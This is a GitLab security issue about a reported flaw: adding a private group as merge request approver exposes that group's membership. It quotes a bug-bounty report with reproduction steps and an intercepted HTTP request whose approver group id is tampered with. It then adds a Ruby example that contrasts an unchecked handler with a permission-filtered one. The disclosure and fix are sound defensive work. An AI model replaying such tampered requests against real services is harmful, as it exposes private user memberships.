Ability to Find Out Private Group's Membership by :group_id
Adding this due to a HackerOne report we've received. In that use case, a user can add a private group and then view the list of members in the private group.
cc @jritchey WDYT of S3/P3 for group member enumeration?
Security issue (dev): https://dev.gitlab.org/gitlab/gitlab-ee/issues/362
Title: Ability to Find Out Private Group's Membership by :group_id
Scope: *.gitlab.com
Weakness: None
Severity: Low
Link: https://hackerone.com/reports/421906
Date: 2018-10-10 03:32:00 +0000
By: @ngalog
Details: Summary: Usually everything about a private group is hidden, including who is in the group; however, the approval endpoint allows an unauthorised user to add any group, including a private group, as the approver. After adding the private group as approver, the merge request page reveals the membership of that private group.
Steps To Reproduce:
- Open a merge request in a project where you have at least maintainer access
- In the approver section, randomly select a group to be the approver, and set the number of approvers to 99
- Click submit merge request and use Burp to intercept the request
POST /golduserngalog/dfgsgfdg/merge_requests/11 HTTP/1.1
Host: gitlab.com
....
utf8=%E2%9C%93&_method=patch&authenticity_token=KW7qU6n6bQ1CX%2BnbRDNluvMxnwi%2F5VQnYRKT0tjMg%2BByZKoHqgFre5y2A2WJSDgOoTqA9ICRYxLyDtfBvN7VPQ%3D%3D&merge_request%5Btitle%5D=Add+new+file&merge_request%5Bdescription%5D=fdfd&merge_request%5Bassignee_id%5D=&merge_request%5Blabel_ids%5D%5B%5D=&merge_request%5Bapprover_ids%5D=&merge_request%5Bapprover_group_ids%5D=3711378&merge_request%5Bapprovals_before_merge%5D=99&merge_request%5Btarget_branch%5D=master&merge_request%5Bforce_remove_source_branch%5D=0&merge_request%5Bsquash%5D=0&merge_request%5Block_version%5D=
Change the merge_request%5Bapprover_group_ids%5D value to any private group id; in this case you can use 3711378, which is my private group. You can verify it is private by visiting https://gitlab.com/api/v4/groups/3711378
Then, after the request, a 302 will take you to the merge request page, and it will show the membership in the approval status.
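The root cause the report describes is a missing authorization filter: the approver group ids submitted in the form are accepted as-is, so the page later renders members of a group the submitting user was never allowed to see. The following Ruby is an added illustration, not GitLab's code: a constructed in-memory group model with public/internal/private visibility, an unchecked id handler that mirrors the reported behaviour, and a hardened handler that keeps only groups the current user can read. All names (Group, GROUPS, can_read_group?, approver_group_ids_for, approval_status_members) and the sample ids are hypothetical.

```ruby
# Constructed, self-contained model of the access check that the report shows
# was missing. Nothing here is GitLab's own code; names and data are invented.

Group = Struct.new(:id, :name, :visibility, :member_ids)

# Constructed sample data: one group per visibility level.
GROUPS = {
  1 => Group.new(1, "public-team",   :public,   [10, 11]),
  2 => Group.new(2, "private-team",  :private,  [20, 21]),
  3 => Group.new(3, "internal-team", :internal, [30]),
}.freeze

# Read permission on a group, modelled after the usual three visibility levels.
# nil stands for an anonymous (unauthenticated) user.
def can_read_group?(user_id, group)
  case group.visibility
  when :public   then true
  when :internal then !user_id.nil?                  # any signed-in user
  when :private  then group.member_ids.include?(user_id)
  else false
  end
end

# Reported behaviour: every submitted id that names an existing group is accepted,
# regardless of whether the submitting user may see that group.
def approver_group_ids_unchecked(raw_param)
  raw_param.to_s.split(",").map(&:to_i).select { |id| GROUPS.key?(id) }
end

# Hardened behaviour: the form value is still parsed the same way, but ids are
# additionally filtered to groups the current user is authorized to read.
def approver_group_ids_for(user_id, raw_param)
  approver_group_ids_unchecked(raw_param).select { |id| can_read_group?(user_id, GROUPS[id]) }
end

# What an "approval status" panel would then display for the stored approver groups.
def approval_status_members(group_ids)
  group_ids.flat_map { |id| GROUPS[id].member_ids }
end

if __FILE__ == $0
  maintainer = 99 # project maintainer who is not a member of private group 2
  puts "unchecked: #{approval_status_members(approver_group_ids_unchecked('2')).inspect}"
  puts "filtered:  #{approval_status_members(approver_group_ids_for(maintainer, '2')).inspect}"
end
```

The important design point is that the filter runs on the server against the submitting user's own permissions, not against the merge request author's or the project's; membership of a private group is only ever rendered for ids that survived that filter, so the later page render has nothing to leak.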